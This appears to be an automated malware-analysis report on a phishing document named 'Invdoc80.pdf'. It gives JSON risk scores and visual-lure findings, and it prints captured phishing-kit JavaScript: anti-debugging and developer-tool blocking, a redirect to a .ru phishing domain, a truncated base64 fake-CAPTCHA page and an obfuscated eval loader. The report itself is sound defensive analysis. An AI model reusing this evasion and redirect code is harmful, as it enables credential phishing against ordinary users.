Windows Analysis Report
Invdoc80.pdf

{
  "risk_score": 1,
  "reasoning": [
    "No headers provided to analyze",
    "Cannot make security assessment without header information",
    "Default to low risk score due to lack of evidence"
  ]
}

Date: unknown

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's security."
}

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
ZhlPUWLPCV = false;
(function EuuLAdAOsB() {
    let iVOAdHwtgX = false;
    const TXeaDSFzDk = 100;
    setInterval(function() {
        const NiurSJtpzd = performance.now();
        debugger;
        const ztiHjdOtwA = performance.now();
        if (ztiHjdOtwA - NiurSJtpzd > TXeaDSFzDk && !iVOAdHwtgX) {
            ZhlPUWLPCV = true;
            iVOAdHwtgX = true;
            window.location.replace('https://accounts.google.com/');
        }
    }, 100);
})();

{
    "risk_score": 9,
    "reasoning": "This script demonstrates high-risk behavior by redirecting the user to a suspicious domain without their consent. It extracts the path (likely an email address) from the URL and appends it to the redirect URL, which is a potential indicator of data exfiltration. The use of a hardcoded, obfuscated redirect URL further increases the risk. Overall, this script exhibits clear signs of malicious intent and should be considered a high-risk security threat."
}

        // Function to capture the path (e.g., aa@aa.com) and redirect
        function redirectWithEmail() {
            // Get the path of the URL (after the domain)
            var path = window.location.pathname.substring(1); // Removes the leading "/"
            
            // Set the base URL for redirection
            var redirectUrl = "https://Sgd.trilivarnor.ru/NiKU3ISg/";
            
            // If path exists (it will be the email address), append it to the base URL
            if (path) {
                window.location.href = redirectUrl ;
            } else {
                window.location.href = redirectUrl; // If no path, just redirect to base URL
            }
        }

        // Call the redirect function when the page loads
        window.onload = redirectWithEmail;
    

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses base64 encoding to obfuscate a URL, which could be a tactic to hide malicious intent. Additionally, it dynamically generates HTML content and writes it to the document, which could potentially be used for DOM manipulation or code injection. While the script does not contain any clear indicators of data exfiltration or remote code execution, the overall level of obfuscation and aggressive DOM manipulation warrant further investigation to determine the script's true purpose and potential risks."
}

if(atob("aHR0cHM6Ly9TZ2QudHJpbGl2YXJub3IucnUvTmlLVTNJU2cv") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tOiAwOw0KICAgIGJhY2tncm91bmQ6IHdoaXRlOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7DQogICAgZmlsdGVyOiBibHVyKDVweCk7DQogICAgei1pbmRleDogLTE7DQp9DQouY29udGVudCB7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGp1c3RpZnktY29udGVudDogc3BhY2UtYmV0d2VlbjsNCiAgICBib3JkZXI6IDFweCBzb2xpZCAjMGYwZTBlOw0KICAgIHBhZGRpbmc6IDIwcHggMTBweDsNCiAgICB3aWR0aDogMzAwcHg7DQogICAgbWFyZ2luOiAyMHB4IGF1dG87DQogICAgYm9yZGVyLXJhZGl1czogNHB4Ow0KICAgIGJveC1zaGFkb3c6IDBweCAycHggNHB4IHJnYmEoMCwgMCwgMCwgMC4yKTsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXSB7DQogICAgZGlzcGxheTogbm9uZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggbGFiZWwgew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBjdXJzb3I6IHBvaW50ZXI7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrbWFyayB7DQogICAgd2lkdGg6IDIwcHg7DQogICAgaGVpZ2h0OiAyMHB4Ow0KICAgIGJvcmRlcjogMnB4IHNvbGlkICNkM2QzZDM7DQogICAgYm9yZGVyLXJhZGl1czogM3B4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogICAgLyogbWFyZ2luLXJpZ2h0OiAxMHB4OyAqLw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleHQgew0KICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsNCiAgICBmb250LXNpemU6IDE0cHg7DQogICAgbGVmdDogNnB4Ow0KICAgIGNvbG9yOiAjZmZmZmZmOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtbG9nbyBpbWcgew0KICAgIGhlaWdodDogNDBweDsNCiAgICB0b3A6IDBweDsNCiAgICByaWdodDogMDsNCiAgICBmbG9hdDogcmlnaHQ7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KfQ0KDQouY2FwdGNoYS1sb2FkZXIgew0KIGJhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTsNCiBib3JkZXI6NnB4IHNvbGlkICM0ZDkwZmU7DQogYm9yZGVyLXJhZGl1czozNnB4Ow0KIGJvcmRlci1ib3R0b20tY29sb3I6dHJhbnNwYXJlbnQ7DQogYm9yZGVyLXJpZ2h0LWNvbG9yOnRyYW5zcGFyZW50Ow0KIGhlaWdodDozNnB4Ow0KIG91dGxpbmU6MDsNCiBwb3NpdGlvbjpyZWxhdGl2ZTsNCiAvKnJpZ2h0OiAxODJweDsqLw0KIHdpZHRoOjM2cHg7DQogYm94LXNpemluZzpib3JkZXItYm94Ow0KIGFuaW1hdGlvbjogc3BpbiBsaW5lYXIgMXMgaW5maW5pdGU7DQogZGlzcGxheTogbm9uZTsNCn0NCg0KQGtleWZyYW1lcyBzcGluIHsNCiAgICAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDBkZWcpOyB9DQogICAgMTAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDM2MGRlZyk7IH0NCn0NCg0KLmNhcHRjaGEtY29udGVudCB7DQogICAgZGlz

{
    "risk_score": 10,
    "reasoning": "This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10."
}

new Proxy({},{get:(_,n)=>eval([...n].map(n=>+("">n)).join``.replace(/.{8}/g,n=>String.fromCharCode(+("0b"+n))))}).

{
  "contains_trigger_text": true,
  "trigger_text": "Kindly open to Review Document below \"Staff Payroll for January 2025\"",
  "prominent_button_name": "Review Document",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://oulkiate.s3.ap-southeast-1.amazonaws.com

{
  "brands": "unknown"
}

{
  "contains_trigger_text": true,
  "trigger_text": "Validate my click",
  "prominent_button_name": "Validate my click",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}